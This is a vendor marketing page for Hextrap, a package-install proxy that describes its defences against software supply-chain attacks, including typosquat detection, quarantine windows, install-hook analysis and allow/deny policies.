The Firewall Your Developers
Will Actually Use.
Security tools that create friction get worked around. Hextrap is a transparent proxy — it fits into existing workflows without changing them, giving you visibility and control without a constant battle for adoption.
How Hextrap detects threats
Multiple independent detection layers, running on every install in real time
Typosquat Detection
Real-timeFuzzy string matching against a database of popular packages using normalized names and phonetic similarity. Catches requests vs request, numpy vs numyp, lodash vs 1odash, and thousands of documented campaign variants. Threshold configurable per firewall.
Soak Time Quarantine
ProactiveNew package versions are held in quarantine for a configurable window (1–30 days) before your team can install them. This neutralizes zero-day campaigns that publish malicious packages and rely on fast installation before detection catches up. The most effective control for novel threats.
Coordinated Burst Detection
HeuristicMass simultaneous publishing of packages is a signature of organized attack campaigns — Lazarus Group, the s1ngularity campaign, and others have used coordinated bursts to overwhelm manual review queues. Hextrap detects abnormal publishing velocity as a standalone risk signal.
Malicious Install Hooks
BehavioralPackages that run code at install time (setup.py postinstall, npm preinstall scripts) are flagged and analyzed. Outbound network connections, file system access, and shell invocations from install scripts are high-confidence indicators of malicious intent.
Obfuscation Detection
Static analysisBase64-encoded payloads, heavily nested eval() chains, and other obfuscation techniques are common in supply chain malware designed to evade signature-based scanners. Hextrap detects structural obfuscation as a risk signal independent of known signatures.
Dependency Confusion
PolicyAttacks where a malicious public package is published with the same name as an internal private package, causing package managers to pull the malicious version. Hextrap's allow/deny list controls let you explicitly protect your private namespace from public shadowing.
Granular policy controls — without a policy language.
Security controls are only as good as the team's ability to configure and maintain them. Hextrap's controls are designed to be legible to developers and enforceable without ongoing tuning.
Define exactly which packages are permitted. Anything not on the list is blocked. Best for teams with mature dependency management who want full control.
Block specific known-bad packages, domains, or name patterns. Everything else passes through. Lower friction, good starting point for most teams.
Quarantine all packages published within the last N days (1–30). Set-and-forget protection against zero-day campaign windows without any per-package decisions.
Block packages with no releases in a configurable period. Abandoned packages are high-value takeover targets — blocking them removes the vector entirely.
Every install attempt is logged with package, version, actor, policy result, and reason.
Fits into your security stack.
Hextrap doesn't replace your existing tools — it fills the gap they can't cover.
REST API
Full API access for querying activity logs, managing allow/deny lists programmatically, and integrating with SIEM or ticketing workflows.
Webhook Notifications
Push install events to Slack, PagerDuty, or any HTTP endpoint. Get alerted in real time when a block occurs or a new threat pattern is detected.
CI/CD Integration
Service credentials for CI runners separate from developer credentials. Different policy profiles per environment if needed. Pipeline installs are fully audited.
SSO / OIDC
Integrate with Okta, Azure AD, Google Workspace, or any OIDC provider. User provisioning and deprovisioning ties into your existing identity lifecycle.
Deploy in a day. Report results by the end of the week.
No POC project, no migration, no professional services. Talk to us if you want a technical walkthrough.